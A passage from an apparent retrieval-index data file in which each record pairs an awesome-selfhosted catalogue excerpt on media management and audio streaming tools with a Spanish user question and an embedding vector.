0.10693, 0.01067, -0.14198, 0.03697, 0.04657, 0.05601, -0.04982, -0.10123, -0.04601, 0.00927, -0.00466, 0.05788, -0.0597, -0.02969, -0.07105, 0.01103, 0.01195, -0.01084, -0.10966, -0.03786, 0.01979, -0.01211, -0.07779, -0.04178, -0.00584, 0.01896, -0.03653, 0.03433, 0.03011, -0.03868, 0.02567, 0.02975, -0.04839, -0.02612, 0.0055, -0.01072, 0.02726, -0.04585, 0.08237, 0.04174, 0.05917, 0.02336, -0.0065, -0.01044, 0.04638, 0.01313, -0.03063, 0.06219, 0.06016, 0.03953, -0.00997, 0.00741, -0.07815, -0.02338, -0.04144, -0.07662, 0.07949, -0.00017, 0.00379, 0.0258, -0.015, -0.03743, -0.03692, 0.06418, -7e-05, -0.03452, -0.0469, -0.0676, -0.03732, 0.02709, 0.09946, -0.06266, -0.02868, 0.05612, 0.01666, 0.01915, -0.00402, 0.04032]} +{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: Youtarr β€” Download videos from YouTube channels on a schedule via yt-dlp, with a web UI to browse and selectively download videos. Integrates with Plex Media Server and generates NFO metadata for Jellyfin, Kodi, and Emby [⚠, ISC, Docker]. youtube-dl-nas β€” Authenticated yt-dlp download queue for video, audio and subtitles, with history, mobile sharing and NAS file management (fork of youtube-dl-server) [⚠, MIT, Python/Docker]. YoutubeDL-Server β€” Web and REST interface to Youtube-DL for downloading videos onto a server [MIT, Python/Docker]. yt-dlp Web UI β€” Web GUI for yt-dlp [MPL-2.0, Docker/Go/Nodejs].", "indexar": "con quΓ© puedo gestionar y organizar videos descargados en mi servidor?", "v": [0.04495, 0.19931, -0.15113, -0.15594, -0.0395, -4e-05, 0.02894, 0.0207, 0.00022, -0.10699, -0.10441, -0.14496, 0.00895, -0.13895, 0.01663, 0.05239, 0.26402, -0.05545, -0.01577, 0.07459, 0.01064, 0.06106, 0.08138, -0.0233, -0.0461, -0.06026, 0.09039, -0.04915, -0.18895, -0.07528, -0.03324, 0.00776, 0.0007, -0.04553, 0.07537, 0.0223, -0.02201, 0.15031, -0.09117, -0.0223, -0.05168, 0.06198, -0.12756, 0.05075, 0.05352, -0.05517, 0.08093, -0.12405, 0.03138, -0.01809, -0.05938, -0.03434, -0.10124, -0.00074, -0.06166, -0.06494, -0.00022, -0.21062, 0.12032, 0.02496, -0.08782, 0.03072, 0.01129, 0.07253, 0.09592, 0.05617, 0.01028, 0.0353, -0.07424, 0.02844, -0.10019, 0.03429, -0.01849, -0.00889, 0.06147, 0.07813, -0.00716, 0.05038, 0.00782, 0.0945, 0.07327, 0.01943, -0.02557, 0.05802, -0.08762, -0.10101, -0.07756, -0.00395, 0.05612, -0.02244, 0.05439, -0.03018, -0.09048, -0.04229, -0.06202, -0.02252, 0.10512, 0.03983, 0.063, 0.04526, -0.02238, 0.0554, -0.0184, 0.06994, -0.01248, 0.1063, 0.08517, -0.07336, 0.00117, -0.05483, 0.01636, -0.01532, 0.00667, 0.02643, -0.03122, -0.02362, 0.02418, 0.00288, 0.02333, 0.04884, -0.03038, -0.03334, 0.03528, 0.04757, 0.08402, -0.07241, 0.07529, 0.09208, -0.02561, -0.00603, 0.00785, -0.06466, -0.07877, 0.02007, 0.01511, -0.04587, 0.01834, -0.05725, -0.02726, -0.06537, -0.07543, 0.03221, -0.05679, 0.01791, 0.11661, -0.02068, 0.07036, -0.07463, -0.04295, 0.01568, 0.09026, -0.07632, -0.02706, -0.04715, -0.06658, 0.00998, 0.00127, -0.11404, -0.08876, 0.0222, -0.01286, 0.03531, 0.02307, 0.04278, -0.01754, -0.00613, 0.01043, 0.04956, -0.01157, 0.07175, -0.04039, 0.03363, -0.03768, -0.07764, 0.00395, -0.09037, -0.02027, -0.12743, 0.05445, 0.05088, -0.01145, 0.0367, -0.00037, 0.06841, -0.06893, -0.03933, -0.03097, 0.03189, -0.0246, 0.00859, 0.03386, 0.04991, -0.01943, -0.02163, 0.0703, -0.07954, -0.05683, -0.0402, -0.02127, 0.03207, -0.04013, -0.08068, -0.01564, -0.00415, -0.02278, -0.01662, -0.05178, 0.10147, 0.02492, 0.02965, -0.00903, 0.0187, 0.08701, -0.06363, -0.05237, -0.00113, 0.04718, -0.00598, 0.01347, -0.04023, -0.03584, 0.03435, 0.04751, -0.04605, -0.0019, 0.04521, 0.03061, 0.02499, 0.03316, 0.0491, -0.06, 0.01222, -0.02438, -0.00062, 0.0223, -0.02476, 0.01763, -0.05221, -0.05976, -0.02971, 0.00942, 0.08574, 0.00032, -0.05845, -0.08913, -0.08271, -0.02708, 0.07451, -0.06051, -0.0326, 0.01053, -0.00834, 0.05082, -0.00777, -0.02036, -0.00789]} +{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: Youtarr β€” Download videos from YouTube channels on a schedule via yt-dlp, with a web UI to browse and selectively download videos. Integrates with Plex Media Server and generates NFO metadata for Jellyfin, Kodi, and Emby [⚠, ISC, Docker]. youtube-dl-nas β€” Authenticated yt-dlp download queue for video, audio and subtitles, with history, mobile sharing and NAS file management (fork of youtube-dl-server) [⚠, MIT, Python/Docker]. YoutubeDL-Server β€” Web and REST interface to Youtube-DL for downloading videos onto a server [MIT, Python/Docker]. yt-dlp Web UI β€” Web GUI for yt-dlp [MPL-2.0, Docker/Go/Nodejs].", "indexar": "hay alguna alternativa libre a youtube-dl con interfaz web?", "v": [0.01314, 0.10177, -0.14593, -0.01061, -0.07612, -0.00949, -0.06275, -0.00759, -0.142, 0.01046, 0.00118, -0.16343, -0.02932, 0.03059, 0.03359, -0.05673, 0.10328, -0.05145, 0.081, -0.2076, -0.02955, 0.05068, -0.17452, -0.06459, -0.07919, -0.17869, -0.07808, 0.00635, -0.05301, -0.07657, -0.00648, 0.02204, -0.00266, 0.04915, -0.08003, 0.03115, 0.15645, 0.11968, 0.0771, -0.09647, 0.02892, -0.01922, -0.11377, 0.15477, 0.01738, 0.00153, -0.1204, -0.05983, -0.02991, 0.02549, 0.00119, -0.02878, -0.04653, 0.04456, 0.06089, -0.02105, 0.1496, -0.18304, -0.02079, -0.04732, -0.09116, 0.03064, 0.0153, -0.03205, 0.04969, 0.08933, -0.09483, 0.05981, 0.02129, 0.10613, 0.01703, 0.0624, -0.00831, -0.04106, 0.01664, 0.04254, -0.09633, 0.00718, 0.01599, 0.06167, 0.07748, -0.08193, 0.079, 0.00592, -0.03923, -0.03056, 0.0829, -0.13746, -0.05519, -0.04399, 0.09488, 0.08736, -0.00136, -0.00345, -0.01142, -0.12959, -0.00129, 0.12278, 0.0166, -0.08307, 0.08339, 0.02234, -0.12309, 0.02574, 0.0261, 0.06574, 0.0547, -0.0402, -0.09641, 0.06922, 0.09174, 0.0453, 0.04547, -0.05288, -0.0518, -0.02175, -0.02769, 0.01149, 0.00369, -0.03107, 0.00882, -0.04446, -0.12343, -0.04413, -0.05291, 0.05535, 0.01564, 0.07289, -0.06272, 0.02751, 0.04802, -0.11158, -0.07767, -0.13795, -0.03169, -0.00413, 0.00754, 0.00737, -0.01463, -0.0402, 0.04555, 0.03283, -0.02052, -0.04342, -0.00259, -0.02285, 0.05612, -0.11433, -0.10385, -0.00775, -0.05653, 0.00328, -0.04009, 0.02944, -0.03797, 0.02662, -0.04919, -0.02643, -0.07417, 0.05923, 0.02427, -0.03792, -0.08143, 0.00066, -0.0167, 0.02226, -0.09472, -0.01891, -0.05941, 0.01161, 0.01528, 0.10347, 0.06285, -0.06432, 0.00921, -0.02472, -0.02534, -0.04375, 0.07081, -0.02484, 0.01226, 0.00029, -0.0505, 0.01926, -0.03344, -0.09333, -0.05568, 0.02211, -0.03628, 0.00441, -0.03816, 0.07077, -0.07664, 0.02162, 0.03432, 0.0567, -0.05121, -0.07108, -0.00192, 0.03241, -0.04085, -0.07605, 0.01652, -0.06886, -0.06308, 0.05782, -0.02333, 0.04918, 0.04052, 0.07286, 0.03589, -0.02311, 0.02649, -0.00272, 0.01655, -0.0076, 0.08348, 0.02548, 0.0197, -0.01295, 0.06024, 0.07903, 0.00104, 0.01602, 0.03556, 0.05438, 0.03975, 0.0004, -0.06552, 0.04024, -0.0564, -0.05746, -0.00725, -0.01277, 0.01336, 0.01232, 0.01259, -0.01445, -0.03527, -0.01835, 0.00766, 0.03954, -0.01193, 0.00533, -0.02724, -0.02939, -0.0853, -0.00745, 0.01612, -0.07052, 9e-05, 0.03535, 0.01083, 0.06051, -0.02589, 0.02071]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: Ampache β€” Web based audio/video streaming application [AGPL-3.0, PHP]. Audiobookshelf β€” Audiobook and podcast server. It streams all audio formats, keeps and syncs progress across devices. Comes with open-source apps for Android and iOS [GPL-3.0, Docker/deb/Nodejs]. Audioserve β€” Simple personal server to serve audio files from directories (audiobooks, music, podcasts...). Focused on simplicity and supports sync of play position between clients [MIT, Rust]. AzuraCast β€” Modern and accessible web radio management suite [Apache-2.0, Docker]. Beets β€” Music library manager and MusicBrainz tagger (command-line and Web interface) [MIT, Python/deb]. Black Candy β€” Music streaming server [MIT, Docker/Ruby]. BotWave β€” FM broadcasting system with server-client architecture for managing multiple Raspberry Pi transmitters remotely [GPL-3.0, Python]. Funkwhale β€” Modern, web-based, convivial, multi-user and free music server [BSD-3-Clause, Python]. gonic β€” Lightweight music streaming server. Subsonic compatible [GPL-3.0, Go/Docker].", "indexar": "quΓ© programa sirve para transmitir mΓΊsica desde el servidor a mis dispositivos mΓ³viles?", "v": [-0.06363, 0.08738, -0.09073, -0.22179, -0.07048, -0.10254, -0.11741, -0.07241, 0.01055, -0.05675, -0.03884, -0.01752, 0.07049, -0.076, 0.08875, -0.04753, 0.19662, -0.08464, 0.07929, 0.01059, 0.03599, 0.03633, -0.0076, -0.10363, -0.08558, 0.1112, 0.07384, -0.02838, -0.14018, -0.03822, 0.01924, -0.0881, 0.08523, -0.0482, -0.07814, -0.06507, 0.02355, 0.1217, -0.0541, -0.00977, -0.02534, -0.04494, 0.0002, -0.0059, 0.04506, -0.11973, 0.047, -0.05822, 0.03222, 0.06133, -0.00742, 0.06177, -0.0713, 0.03652, -0.01929, -0.07003, 0.00372, -0.2319, 0.05, -0.02531, -0.04313, -0.05264, -0.05583, -0.04775, 0.12388, 0.00084, 0.02556, 0.03619, -0.07189, -0.0653, -0.01467, 0.04418, 0.08686, 0.01547, 0.03091, 0.10675, -0.14299, -0.05268, 0.00887, 0.00198, 0.0364, 0.01146, -0.02539, 0.05767, -0.06408, 0.07296, 0.10932, 0.04406, -0.02259, 0.00374, 0.05463, 0.09133, -0.02912, 0.06186, 0.04399, -0.05187, 0.08628, -0.02704, 0.08415, 0.04237, 0.11031, -0.04257, -0.07299, 0.022, -0.05515, 0.09779, 0.14147, -0.11257, 0.07724, 0.03451, -0.04165, -0.03331, -0.02034, 0.00972, -0.0244, -0.04858, 0.03976, -0.02806, 0.00343, 0.08836, -0.08321, 0.02083, 0.07859, 0.02768, 0.11588, 0.01096, 0.01453, 0.0266, 0.03321, 0.06729, 0.07547, -0.07753, 0.03234, 0.01876, -0.02415, -0.04936, 0.08192, -0.07484, 0.01215, -0.0012, 0.11486, 0.09391, -0.04826, 0.01846, 0.09718, 0.01078, 0.08792, -0.04418, 0.00319, 0.02733, -0.03132, 0.03844, -0.13526, -0.02412, -0.10903, 0.02698, 0.03548, -0.08136, -0.11777, 0.05628, -0.03694, 0.01924, -0.01607, 0.00643, 0.00507, -0.056, 0.03261, 0.1231, 0.11722, 0.05361, -0.0799, 0.01884, 0.11791, -0.07462, -0.08478, -0.02083, -0.03373, -0.03286, 0.09335, -0.01938, -0.082, 0.06449, 0.00078, 0.00264, 0.01687, -0.02177, -0.06994, -0.01184, -0.02135, -0.01805, 0.00455, 0.02141, -0.0254, 0.06922, 0.07392, -0.04347, -0.09594, -0.0208, -0.05756, 0.04606, -0.0612, -0.07625, -0.0026, -0.01318, 0.05317, 0.01366, -0.02117, 0.00609, 0.04127, 0.07134, -0.02868, -0.03864, 0.0481, 0.06581, -0.04553, 0.00219, 0.01161, 0.03403, -0.00342, 0.03563, -0.0086, -0.00296, 0.0135, 0.01766, -0.00464, 0.06866, 0.00131, -0.02783, 0.06315, -0.05596, -0.01004, -0.01071, -0.00504, 0.0239, -0.01848, 0.00312, -0.02345, -0.02605, -0.04546, -0.05674, -0.05208, 0.07806, -0.00032, -0.04728, -0.02397, -0.01733, -0.0139, -0.01431, -0.02833, -0.03097, -0.00373, 0.0198, 0.05587, 0.01378, 0.03811, 0.04395]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: Ampache β€” Web based audio/video streaming application [AGPL-3.0, PHP]. Audiobookshelf β€” Audiobook and podcast server. It streams all audio formats, keeps and syncs progress across devices. Comes with open-source apps for Android and iOS [GPL-3.0, Docker/deb/Nodejs]. Audioserve β€” Simple personal server to serve audio files from directories (audiobooks, music, podcasts...). Focused on simplicity and supports sync of play position between clients [MIT, Rust]. AzuraCast β€” Modern and accessible web radio management suite [Apache-2.0, Docker]. Beets β€” Music library manager and MusicBrainz tagger (command-line and Web interface) [MIT, Python/deb]. Black Candy β€” Music streaming server [MIT, Docker/Ruby]. BotWave β€” FM broadcasting system with server-client architecture for managing multiple Raspberry Pi transmitters remotely [GPL-3.0, Python]. Funkwhale β€” Modern, web-based, convivial, multi-user and free music server [BSD-3-Clause, Python]. gonic β€” Lightweight music streaming server. Subsonic compatible [GPL-3.0, Go/Docker].", "indexar": "existe alguna alternativa libre de Ampache que me permita sincronizar la posiciΓ³n del reproductor entre varios clientes?", "v": [0.01539, 0.11353, -0.18537, 0.00523, -0.05365, -0.00188, 0.04137, -0.07054, -0.27251, -0.14967, 0.07832, -0.10814, 0.06687, 0.00471, 0.24957, -0.1248, -0.0994, -0.05371, 0.08921, 0.09326, 0.00632, -0.07532, -0.03223, -0.05731, -0.04875, -0.03012, 0.0309, -0.03173, -0.15997, 0.04583, 0.03856, 0.02875, 0.0031, 0.03212, 0.06287, -0.06663, 0.04785, -0.01661, 0.05654, 0.01557, 0.0171, -0.07256, -0.06953, 0.03072, -0.05467, 0.08145, -0.13678, 0.0639, -0.0003, 0.13916, -0.08996, 0.0827, -0.09051, -0.01614, 0.06676, -0.01982, 0.12291, -0.04158, 0.06654, -0.0575, 0.03563, 0.13134, 0.0487, -0.02731, 0.04588, 0.11322, 0.00021, -0.09759, -0.00421, 0.01044, -0.02305, -0.03501, 0.03895, -0.05321, -0.08212, 0.13092, -0.10545, 0.03816, -0.06741, 0.04942, 0.09496, -0.09706, -0.07602, 0.01308, -0.08478, -0.05471, 0.06406, 0.00497, 0.02471, 0.01884, 0.06408, 0.07744, 0.03481, 0.13176, 0.03555, -0.10909, -0.03685, 0.0688, -0.06129, 0.03899, 0.0971, 0.1005, -0.09769, -0.01768, 0.02868, 0.05505, 0.04183, -0.05664, -0.0142, 0.05315, 0.04409, 0.01603, -0.03293, -0.04453, -0.113, -0.06292, -0.03691, 0.01773, 0.03886, -0.00099, -0.00181, -0.03962, 0.01303, -0.03501, -0.0172, 0.04293, -0.00249, 0.0436, -0.03658, 0.02091, 0.04011, -0.01562, -0.00985, -0.09685, -0.07597, -0.03267, 0.02418, 0.01929, 0.03222, 0.00217, 0.02037, 0.01971, -0.05019, -0.00875, 0.05029, -0.06726, 0.02466, -0.06394, -0.057, 0.00387, -0.10183, -0.05638, -0.03084, 0.05647, -0.05421, 0.09419, 0.00219, -0.02638, 0.03863, 0.06101, -0.02333, -0.05263, 0.02927, -0.02799, 0.01619, 0.04082, -0.10097, -0.01812, 0.01326, 0.00667, -0.03898, 0.0271, 0.02128, -0.12347, 0.00098, -0.0747, -0.0284, -0.05156, 0.03243, -0.04776, 0.03373, 0.02544, -0.05614, -0.00294, -0.01278, -0.02307, 0.00166, 0.02402, -0.03795, 0.03058, 0.03389, -0.01288, -0.06881, -0.08155, 0.03004, -0.04396, 0.00918, -0.0309, 0.02398, 0.02264, -0.06273, -0.04101, 0.06255, -0.02465, 0.00707, 0.00626, -0.04358, 0.05843, -0.00367, 0.00241, 0.0742, -0.02283, 0.08943, -0.00747, -0.08645, -0.09331, 0.03082, -0.07034, -0.00633, -0.0191, 0.03788, 0.04968, 0.05737, -0.02038, -0.07099, 0.02174, 0.02875, 0.06092, 0.00438, 0.0649, -0.00113, 0.06461, -0.04989, -0.01145, 0.0279, 0.04601, 0.0221, -0.02651, 0.03358, -0.07049, 0.04917, 0.04923, -0.01925, -0.01239, -0.02115, -0.03872, -0.11659, -0.03766, 0.0034, -0.001, -0.00148, 0.07601, 0.02622, -0.03952, 0.08116, -0.0056]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: Ampache β€” Web based audio/video streaming application [AGPL-3.0, PHP]. Audiobookshelf β€” Audiobook and podcast server. It streams all audio formats, keeps and syncs progress across devices. Comes with open-source apps for Android and iOS [GPL-3.0, Docker/deb/Nodejs]. Audioserve β€” Simple personal server to serve audio files from directories (audiobooks, music, podcasts...). Focused on simplicity and supports sync of play position between clients [MIT, Rust]. AzuraCast β€” Modern and accessible web radio management suite [Apache-2.0, Docker]. Beets β€” Music library manager and MusicBrainz tagger (command-line and Web interface) [MIT, Python/deb]. Black Candy β€” Music streaming server [MIT, Docker/Ruby]. BotWave β€” FM broadcasting system with server-client architecture for managing multiple Raspberry Pi transmitters remotely [GPL-3.0, Python]. Funkwhale β€” Modern, web-based, convivial, multi-user and free music server [BSD-3-Clause, Python]. gonic β€” Lightweight music streaming server. Subsonic compatible [GPL-3.0, Go/Docker].", "indexar": "cual es una herramienta sencilla para crear un servidor de radio FM que gestione mΓΊltiples emisoras remotamente?", "v": [0.1078, 0.03162, -0.03547, -0.18581, -0.0563, -0.04954, -0.05585, 0.01616, -0.08203, -0.10272, -0.12098, -0.0454, 0.13311, -0.07662, 0.19389, 0.06785, 0.13111, -0.04611, -0.00526, 0.00937, 0.01069, 0.02183, 0.02091, -0.02685, -0.1318, -0.0291, 0.04664, -0.0562, -0.09293, 0.01753, 0.14069, 0.05055, 0.04682, -0.05929, -0.02623, -0.05386, 0.01892, 0.17337, -0.02883, 0.02134, 0.08572, 0.02434, -0.09706, 0.0329, 0.00556, 0.00141, 0.02226, -0.03025, 0.10736, 0.05733, -0.06029, -0.06794, -0.08847, -0.01982, 0.02081, -0.08406, 0.15666, -0.26191, -0.02542, -0.06817, -0.09305, 0.00269, -0.00097, -0.11282, -0.03187, -0.03379, -0.00201, -0.06653, -0.09734, -0.00846, -0.0517, -0.03973, 0.07878, 0.03062, 0.03849, 0.05215, -0.11272, -0.0116, 0.04067, -0.00489, -0.0235, -0.07715, -0.0118, -0.02394, -0.13661, -0.07238, 0.09122, -0.0185, -0.09036, -0.03328, -0.0784, 0.00446, -0.0845, 0.04057, 0.09763, -0.04999, 0.07713, -0.02731, -0.05954, 0.00183, 0.12145, 0.05857, -0.04765, 0.04369, -0.01893, 0.0883, 0.08783, -0.09315, 0.04351, -0.00426, 0.04013, -0.0183, 0.03726, -0.03755, -0.08194, 0.01433, -0.05238, -0.02922, 0.01245, 0.00767, -0.05746, 0.00091, 0.02103, 0.02323, 0.07888, -0.01951, -0.05344, -0.01938, 0.04143, 0.02132, 0.01928, -0.04809, -0.03185, -0.04534, -0.04905, -0.00636, -0.00328, -0.13526, -0.05563, -0.1017, 0.02764, 0.0707, -0.052, -0.03126, 0.08441, -0.01445, 0.04285, -0.08507, -0.06004, 0.0816, -0.01111, -0.04243, -0.07328, -0.02601, -0.08151, 0.00453, 0.00903, -0.03726, -0.10182, 0.10519, -0.02217, 0.03247, 0.08033, -0.02229, 0.06943, -0.08283, 0.0201, 0.06335, 0.07114, -0.05053, -0.11451, 0.01361, 0.09653, -0.0782, -0.07118, -0.04619, -0.08169, -0.03359, 0.04117, -0.04669, -0.07046, 0.03294, -0.02854, 0.00344, 0.05596, 0.00586, -0.01602, -0.04192, -0.06112, -0.03405, 0.04596, -0.0033, -0.05964, -0.01909, 0.10256, 0.00024, 0.00142, -0.07386, -0.03376, -0.00606, -0.0762, -0.02875, 0.03646, -0.03484, 0.01474, 0.00914, -0.02561, 0.02882, 0.0547, 0.08758, 0.01611, -0.04879, 0.04674, -0.06719, -0.05346, 0.02717, 0.05336, -0.06101, 0.02328, 0.03646, 0.03566, -0.02098, 0.02959, -0.00781, -0.03561, 0.04772, 0.04708, 0.03287, 0.08538, -0.02464, -0.00667, -0.00062, -0.00961, 0.02744, 0.01893, -0.03729, 0.04033, -0.01433, -0.02035, -0.03097, 0.00183, 0.06721, -0.03155, 0.01913, -0.00187, -0.05781, -0.02223, 0.0279, -0.0775, -0.03935, -0.01391, -0.02018, 0.06628, -0.02238, 0.10175, -0.02237]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: koel β€” Personal music streaming server that works [MIT, PHP]. LibreTime β€” Broadcast streaming radio on the web (fork of [Airtime](https://github.com/sourcefabric/Airtime)) [AGPL-3.0, Docker/PHP]. LMS β€” Access your self-hosted music using a web interface [GPL-3.0, Docker/deb/C++]. Lyrion Music Server β€” Server software which controls a wide range of Squeezebox/Slim Devices audio players and compatible hardware (formerly Logitech Media Server) [GPL-2.0, deb/Docker/Perl]. moOde Audio β€” Audiophile-quality music playback for the wonderful Raspberry Pi family of single board computers [GPL-3.0, PHP]. Mopidy β€” Extensible music server. Offers a superset of the mpd API, as well as integration with 3rd party services like Spotify, SoundCloud etc [⚠, Apache-2.0, Python/deb]. mpd β€” Daemon to remotely play music, stream music, handle and organize playlists. Many clients available [GPL-2.0, C++]. mStream β€” Music streaming server with GUI management tools. Runs on Mac, Windows, and Linux [GPL-3.0, Nodejs].", "indexar": "quΓ© programa hay para transmitir mΓΊsica por internet con interfaz web?", "v": [0.0121, 0.09902, -0.01315, -0.16338, -0.00922, -0.10565, -0.0928, -0.04232, -0.06009, -0.00751, 0.06928, -0.02822, 0.02172, -0.03767, 0.06683, 0.02944, 0.13924, -0.03828, 0.11352, -0.08745, -0.01015, 0.08106, -0.1036, -0.12123, -0.12401, -0.04166, -0.02034, 0.01147, -0.03464, 0.01917, -0.04498, -0.07136, 0.06921, 0.02388, -0.11746, -0.03684, 0.12187, 0.18777, 0.07928, -0.06306, 0.0185, -0.03261, -0.01105, 0.05555, 0.08557, -0.04653, -0.01353, -0.09461, 0.05816, -0.00347, 0.02636, 0.03856, -0.01831, 0.01396, 0.02701, -0.13841, -0.00928, -0.21496, 0.01121, -0.00297, -0.0146, 0.01486, -0.07535, 0.01208, 0.04971, 0.05012, -0.02168, 0.0299, -0.01982, 0.12322, 0.07263, 0.04079, 0.05399, -0.01577, 0.04959, 0.06882, -0.10989, -0.03415, 0.02096, -0.07774, 0.0059, 0.00121, 0.02828, 0.05794, -0.09258, 0.05426, 0.07355, -0.07875, -0.08134, -0.02128, 0.04882, 0.10125, 0.00053, -0.05598, 0.06841, -0.11571, 0.05005, -0.00376, 0.05676, -0.06563, -0.02348, 0.01542, -0.16582, 0.06231, -0.04751, 0.04658, 0.11662, -0.0628, -0.05729, 0.07745, -0.01263, 0.00579, 0.00614, -0.03919, 0.00209, -0.06543, 0.05269, -0.01419, 0.00049, -0.03181, -0.05893, 0.08023, -0.00313, 0.03073, 0.03842, 0.06797, 0.00397, 0.08226, -0.03261, 0.0303, 0.00336, -0.12242, -0.0106, -0.10298, 0.00378, -0.0327, -0.03255, -0.11487, 0.06617, -0.01257, 0.08476, 0.01248, -0.07105, 0.05481, 0.0381, -0.00209, 0.0442, -0.06919, -0.11411, 0.0151, -0.09676, 0.1096, -0.10563, -0.02868, -0.04356, 0.03668, 0.02072, -0.00049, -0.088, -0.01495, -0.06224, 0.0129, 0.00281, -0.04493, 0.03536, 0.01605, -0.08386, 0.15857, 0.03044, 0.03923, -0.08663, 0.04035, 0.08129, -0.10472, -0.11743, 0.01489, -0.06638, -0.06381, 0.08053, -0.02503, -0.06413, 0.01022, 0.04179, 0.04004, -0.03776, -0.00142, -0.06909, 0.01229, -0.11693, -0.01166, -0.02365, -0.00217, -0.0618, 0.11129, 0.12943, 0.0411, -0.08609, -0.00765, -0.02931, 0.0341, -0.05995, -0.11109, 0.01387, -0.04833, 0.00955, 0.05473, 0.01322, -0.04491, 0.0375, 0.09863, -0.00467, -0.08737, -0.02307, 0.01203, -0.02971, 0.0283, 0.03293, 0.0057, 0.01133, 0.05685, -0.03009, 0.00134, 0.0131, 0.02932, 0.0345, 0.00888, 0.01036, -0.02653, 0.0535, -0.00688, -0.0287, -0.06889, -0.01561, -0.02897, -0.06164, -0.01595, -0.08219, -0.03484, -0.07324, -0.01942, -0.07718, 0.03617, 0.01509, -0.0225, 0.04091, -0.03578, -0.05181, 0.00521, 0.01077, -0.01328, -0.0624, -0.00426, 0.01323, 0.03848, 0.03505, 0.07851]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: koel β€” Personal music streaming server that works [MIT, PHP]. LibreTime β€” Broadcast streaming radio on the web (fork of [Airtime](https://github.com/sourcefabric/Airtime)) [AGPL-3.0, Docker/PHP]. LMS β€” Access your self-hosted music using a web interface [GPL-3.0, Docker/deb/C++]. Lyrion Music Server β€” Server software which controls a wide range of Squeezebox/Slim Devices audio players and compatible hardware (formerly Logitech Media Server) [GPL-2.0, deb/Docker/Perl]. moOde Audio β€” Audiophile-quality music playback for the wonderful Raspberry Pi family of single board computers [GPL-3.0, PHP]. Mopidy β€” Extensible music server. Offers a superset of the mpd API, as well as integration with 3rd party services like Spotify, SoundCloud etc [⚠, Apache-2.0, Python/deb]. mpd β€” Daemon to remotely play music, stream music, handle and organize playlists. Many clients available [GPL-2.0, C++]. mStream β€” Music streaming server with GUI management tools. Runs on Mac, Windows, and Linux [GPL-3.0, Nodejs].", "indexar": "con quΓ© puedo montar un servidor de radio en lΓ­nea?", "v": [-0.04561, 0.07815, -0.11827, -0.11794, -0.20089, -0.05437, -0.00186, 0.02782, -0.06393, -0.07672, -0.06545, -0.0588, 0.19272, -0.07947, 0.12657, 0.09043, 0.10231, 0.01274, 0.05321, -0.01272, -0.02684, 0.00543, 0.03714, -0.04834, -0.00569, 0.04717, 0.07774, -0.10718, -0.09304, 0.05055, 0.01666, 0.05943, 0.07704, 0.07201, -0.03772, -0.07269, 0.0474, 0.26215, 0.01998, 0.03507, 0.02805, -0.04048, -0.04052, 0.02434, 0.00215, -0.01286, 0.02517, -0.10905, 0.06426, 0.02582, 0.01925, -0.03634, -0.03276, 0.01393, -0.0512, -0.01191, 0.09941, -0.1417, 0.12768, -0.03812, -0.08303, 0.02089, 0.00125, -0.04734, 0.04192, 0.0337, -0.06143, -0.03405, -0.11521, -0.10708, -0.07119, -0.04371, -0.00401, -0.02202, 0.04379, 0.07973, -0.06501, -0.03902, 0.08218, 0.03036, 0.02007, 0.04647, 0.02031, 0.10306, -0.12666, 0.05037, -0.01759, -0.04398, 0.00596, 0.0394, 0.04793, 0.10862, -0.06039, 0.04134, 0.00417, -0.13716, 0.05697, 0.02073, 0.02575, -0.04941, 0.00271, 0.10276, -0.06175, 0.08446, 0.0558, 0.06397, 0.06475, -0.06721, 0.10531, -0.0096, 0.03756, -0.03334, -0.03883, -0.00502, -0.08574, -0.1304, 0.0246, 0.05922, -0.02691, 0.05172, -0.10066, 0.07125, 0.12315, 0.03742, 0.07641, -0.04543, 0.02547, 0.05203, -0.00751, -0.03008, -0.01003, 0.00641, -0.02884, -0.10726, -0.02618, 0.01521, -0.00267, -0.06008, -0.05971, -0.06478, 0.06702, 0.005, -0.10797, 0.05155, 0.02459, 0.03118, 0.0666, -0.14524, -0.08294, 0.01594, 0.06025, 0.03711, -0.09056, -0.00734, -0.09419, -0.04703, 0.09099, -0.01912, -0.00576, 0.08574, 0.01707, 0.05747, 0.05054, 0.01128, 0.03247, -0.02655, -0.03265, 0.04178, 0.052, -0.03585, -0.08446, 0.03529, 0.07336, -0.09593, -0.02306, 0.01069, -0.10547, 0.02085, 0.08566, 0.01687, -0.09584, 0.00558, -0.00919, 0.00432, -0.03297, 